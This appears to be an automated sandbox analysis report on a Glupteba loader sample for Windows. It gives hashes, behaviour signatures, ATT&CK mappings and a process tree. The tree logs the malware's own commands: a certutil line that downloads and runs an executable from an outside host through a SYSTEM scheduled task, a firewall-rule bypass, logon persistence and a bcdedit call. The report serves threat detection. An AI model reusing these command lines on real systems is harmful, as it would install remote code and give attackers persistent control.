Overview

overview

10

Static

static

8

5a821f9282...00.exe

windows7-x64

10

5a821f9282...00.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    158s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220722-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-08-2022 03:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00.exe

  • Size

    4.2MB

  • MD5

    d7b5c0dfacada838878509c0e797e38c

  • SHA1

    c03590cbfeba3f9820457e4ac083144896c7b4c6

  • SHA256

    5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00

  • SHA512

    0af0b8fb10b7c9362b6dc47526cea53c5dcb1745d8eb10b8b89585c09a492c5860000b38ceb7807034b776bc6923302bc7f6167d8ee4f138e66c7ed097b62548

Score
10/10
gluptebadiscoverydropperevasionloaderpersistenceupx

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 10 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00.exe
    "C:\Users\Admin\AppData\Local\Temp\5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3664
    • C:\Users\Admin\AppData\Local\Temp\5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00.exe
      "C:\Users\Admin\AppData\Local\Temp\5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:3548
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4888
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:4908
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:992
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2632
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

    Download Submit
  • C:\Windows\rss\csrss.exe
    Filesize

    4.2MB

    MD5

    d7b5c0dfacada838878509c0e797e38c

    SHA1

    c03590cbfeba3f9820457e4ac083144896c7b4c6

    SHA256

    5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00

    SHA512

    0af0b8fb10b7c9362b6dc47526cea53c5dcb1745d8eb10b8b89585c09a492c5860000b38ceb7807034b776bc6923302bc7f6167d8ee4f138e66c7ed097b62548

    Download Submit
  • C:\Windows\rss\csrss.exe
    Filesize

    4.2MB

    MD5

    d7b5c0dfacada838878509c0e797e38c

    SHA1

    c03590cbfeba3f9820457e4ac083144896c7b4c6

    SHA256

    5a821f9282f6d079eeb89fda84f5cc1b6baa5e87e5bf04a9c5721863e6e23d00

    SHA512

    0af0b8fb10b7c9362b6dc47526cea53c5dcb1745d8eb10b8b89585c09a492c5860000b38ceb7807034b776bc6923302bc7f6167d8ee4f138e66c7ed097b62548

    Download Submit
  • memory/992-154-0x0000000000000000-mapping.dmp
    Download
  • memory/1440-145-0x0000000000000000-mapping.dmp
    Download
  • memory/1440-157-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/1440-151-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/1440-150-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/1440-149-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/1456-138-0x0000000000000000-mapping.dmp
    Download
  • memory/1456-144-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/1456-141-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/1456-140-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/1456-148-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/2624-142-0x0000000000000000-mapping.dmp
    Download
  • memory/2632-156-0x0000000000000000-mapping.dmp
    Download
  • memory/3548-143-0x0000000000000000-mapping.dmp
    Download
  • memory/3664-137-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/3664-132-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/3664-136-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/3664-135-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/3664-134-0x0000000005540000-0x0000000005C36000-memory.dmp
    Filesize

    7.0MB

    Download
  • memory/3664-139-0x0000000000400000-0x0000000004B5B000-memory.dmp
    Filesize

    71.4MB

    Download
  • memory/3664-133-0x0000000005190000-0x0000000005537000-memory.dmp
    Filesize

    3.7MB

    Download
  • memory/4888-152-0x0000000000000000-mapping.dmp
    Download
  • memory/4908-153-0x0000000000000000-mapping.dmp
    Download